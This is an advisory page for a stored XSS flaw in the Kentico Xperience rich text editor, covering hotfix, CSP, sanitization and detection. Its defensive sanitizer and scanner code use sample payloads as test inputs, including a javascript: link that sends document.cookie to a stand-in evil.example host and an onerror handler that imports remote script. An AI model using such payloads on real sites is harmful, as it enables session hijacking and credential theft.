CVE-2024-58318

6.1 MEDIUM

📋 TL;DR

A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts through the rich text editor component. This could enable attackers to execute arbitrary JavaScript in users' browsers when they view affected pages or forms. Organizations using Kentico Xperience with the vulnerable rich text editor component are affected.

💻 Affected Systems

Products:
  • Kentico Xperience
Versions: Specific versions not detailed in provided references, but hotfixes are available
Operating Systems: Windows, Linux
Default Config Vulnerable: ⚠️ Yes
Notes: Affects the rich text editor component used in page and form builders

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal session cookies, redirect users to malicious sites, perform actions on behalf of authenticated users, or deploy malware through the compromised application.

🟠

Likely Case

Attackers with access to content editing capabilities could inject malicious scripts that execute when other users view affected content, potentially leading to session hijacking or credential theft.

🟢

If Mitigated

With server-side input validation and output sanitization of stored rich text, injected scripts and javascript: URIs would be stripped or neutralized before reaching users' browsers.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

Requires a user account with content editing rights (an editor or similar role); exploitation consists of inserting a javascript: or similar malicious URI, or script-bearing markup, through the rich text editor so that it is stored and later rendered to other users.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Available via hotfix download

Vendor Advisory: https://devnet.kentico.com/download/hotfixes

Restart Required: Yes

Instructions:

1. Download the hotfix that matches your installed Kentico Xperience version from Kentico DevNet.
2. Apply the hotfix to your Kentico Xperience installation (staging first, then production).
3. Restart the application/services.
4. Test the rich text editor functionality: confirm existing content still renders and that a link with a javascript: URL is no longer preserved.

🔧 Temporary Workarounds

Disable rich text editor for untrusted users

Applies to: all

Restrict access to the rich text editor component to trusted administrators only. The content editor role is exactly the level of access an attacker needs for this issue, so "trusted" should mean a small, audited group of accounts.

Implement content security policy

Applies to: all

Add Content-Security-Policy headers to restrict script execution. A script-src policy without 'unsafe-inline' blocks inline script blocks, on* event handlers and javascript: URIs, which covers the kind of payload this vulnerability stores, but it also breaks any legitimate inline scripts the site relies on. Roll it out as Content-Security-Policy-Report-Only first, fix the reported breakage, then enforce.

Content-Security-Policy: script-src 'self'

🧯 If You Can't Patch

  • Implement strict input validation on all rich text editor inputs: validate the href/src of links and images server-side against an allowlist of URL schemes (http, https, mailto, relative paths), not only in the editor's client-side JavaScript, which an attacker can bypass by posting the request directly
  • Sanitize, rather than fully encode, content rendered from the rich text editor: rich text has to keep its HTML markup, so blanket output encoding would break formatting; instead pass the stored HTML through an allowlist-based HTML sanitizer on output that removes script tags, on* event handlers and unsafe URL schemes
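The sanitizer approach described above, as an added example that is not part of the original page and not Kentico's own code. Kentico Xperience is a .NET product; this Python version only illustrates the technique: a tag and attribute allowlist, a URL scheme check applied after the same normalization a browser performs (entity decoding, removal of tab/newline/control characters, so that "java&#9;script:" is still caught), and removal of script/style bodies rather than just their tags. The allowlist itself is an assumption chosen for illustration; a real deployment would match it to the formatting the editor actually offers.

```python
"""Allowlist HTML sanitizer for stored rich text (added example, not Kentico code)."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Illustrative allowlist: only these tags and attributes survive sanitization.
ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "u", "h1", "h2", "h3",
                "ul", "ol", "li", "blockquote", "a", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"", "http", "https", "mailto"}   # "" means a relative URL
VOID_TAGS = {"br", "img"}
RAW_TEXT_TAGS = {"script", "style"}             # drop the body, not only the tag


def is_safe_url(value):
    """Reject javascript:, vbscript:, data: and other non-allowlisted schemes.

    Browsers strip leading/trailing whitespace and ignore tab, newline and other
    C0 control characters anywhere in a URL, so "java\tscript:" still executes.
    Apply the same normalization before looking at the scheme.
    """
    cleaned = "".join(ch for ch in value.strip() if ord(ch) > 0x1F)
    return urlparse(cleaned).scheme in SAFE_SCHEMES   # urlparse lowercases the scheme


class RichTextSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)   # attribute values are entity-decoded
        self.out = []
        self.dropped = []      # (tag, attribute-or-None) removed, for audit logging
        self._skip = None      # set while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if self._skip:
            return
        if tag in RAW_TEXT_TAGS:
            self._skip = tag
            self.dropped.append((tag, None))
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append((tag, None))
            return                                  # tag removed, its text is kept
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append((tag, name))    # covers on* handlers, style, ...
            elif name in URL_ATTRS and not is_safe_url(value):
                self.dropped.append((tag, name))
            else:
                kept.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag == self._skip:
            self._skip = None
        elif not self._skip and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self._skip:
            self.out.append(escape(data, quote=False))   # text is always encoded


def sanitize(html):
    """Return (sanitized HTML, list of removed tags/attributes)."""
    parser = RichTextSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.dropped


if __name__ == "__main__":
    # Constructed sample, not real stored content.
    sample = ('<p>Hi <a href="javascript:alert(document.cookie)">x</a> '
              '<img src="/a.png" onerror="alert(1)"><script>fetch("//evil.example")</script></p>')
    clean, removed = sanitize(sample)
    print(clean)      # <p>Hi <a>x</a> <img src="/a.png"></p>
    print(removed)
```

The `dropped` list is worth writing to an audit log: an editor account whose submissions repeatedly lose `href` or `onerror` attributes is exactly the signal the Detection section below asks for. Note that this sanitizer runs on output, so content already stored before the fix is also covered.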

🔍 How to Verify

Check if Vulnerable:

In a test environment, as an account with content editing rights, use the rich text editor's link dialog to insert a link whose URL is a harmless canary such as javascript:alert(document.domain), save the content, then view the rendered page as a different user and inspect the page source. If the javascript: href is stored and rendered unchanged, the instance is vulnerable.

Check Version:

Check the Kentico Xperience administration panel for the installed version and hotfix number, and compare it against the hotfix list on Kentico DevNet.

Verify Fix Applied:

Repeat the canary test above after applying the hotfix; the javascript: URI should be removed or rewritten to a safe value, both for newly saved content and for content that was stored before the hotfix.

📡 Detection & Monitoring

Log Indicators:

  • Unusual content submissions through rich text editor
  • Suspicious script tags or JavaScript in content storage

Network Indicators:

  • Unexpected external script loads from application pages
  • Suspicious redirects from application URLs

SIEM Query:

Search stored page and form content, and editor submission logs, for script tags, javascript: (and vbscript:/data:) URIs in href or src attributes, and on* event handler attributes. Decode HTML entities and strip tab/newline characters before matching, since a payload can be stored as "java&#9;script:" and still execute.
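The content scan described above, as an added example (not part of the original page and not a Kentico-provided query). It normalizes each stored record the way a browser would before matching, then reports which indicator classes fired per record and author. The record layout and the sample records are constructed for illustration; in practice the input would be an export of the CMS content tables or the editor submission log.

```python
"""Scan stored rich-text records for stored-XSS indicators (added example)."""
import html
import re


def normalise(fragment):
    """Decode entities and drop C0 control characters, mirroring browser parsing."""
    return re.sub(r"[\x00-\x1f]", "", html.unescape(fragment))


# Indicator classes; the names appear in the findings.
INDICATORS = {
    "script_tag": re.compile(r"<\s*/?\s*script\b", re.I),
    "javascript_uri": re.compile(
        r"""\b(?:href|src|action|formaction|xlink:href)\s*=\s*["']?\s*"""
        r"""(?:javascript|vbscript|data):""", re.I),
    "event_handler": re.compile(r"""[\s"'/]on[a-z]+\s*=""", re.I),
    "embed_tag": re.compile(r"<\s*(?:svg|iframe|object|embed)\b", re.I),
}


def scan_records(records):
    """records: iterable of dicts with 'id', 'author', 'html'.

    Returns one finding per record that matched at least one indicator.
    """
    findings = []
    for rec in records:
        body = normalise(rec["html"])
        hits = [name for name, rx in INDICATORS.items() if rx.search(body)]
        if hits:
            findings.append({"id": rec["id"], "author": rec["author"],
                             "indicators": hits})
    return findings


def authors_by_hits(findings):
    """Count flagged records per author, to spot an abused editor account."""
    counts = {}
    for f in findings:
        counts[f["author"]] = counts.get(f["author"], 0) + 1
    return counts


# Constructed sample records, not real Kentico data.
SAMPLE_RECORDS = [
    {"id": 1, "author": "editor1",
     "html": '<p>Welcome to our <a href="/news">news</a> page.</p>'},
    {"id": 2, "author": "editor2",
     "html": '<p><a href="jAvAsCrIpT:fetch(\'//evil.example/?c=\'+document.cookie)">Offer</a></p>'},
    {"id": 3, "author": "editor2",
     "html": '<p><a href="java&#9;script:alert(1)">Hidden</a></p>'},
    {"id": 4, "author": "contractor",
     "html": '<img src="x" onerror="import(\'//evil.example/x.js\')">'},
    {"id": 5, "author": "editor1",
     "html": '<p>Prices in EUR; see the <strong>terms</strong>.</p>'},
]

if __name__ == "__main__":
    found = scan_records(SAMPLE_RECORDS)
    for f in found:
        print(f)
    print(authors_by_hits(found))
```

Treat the output as triage input rather than a verdict: `data:` in an `img src` can be a legitimate inline image, and the event-handler pattern will occasionally hit prose such as " one=". What matters is the combination of indicator, author and timestamp, which is why the scan keeps the author on each finding.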
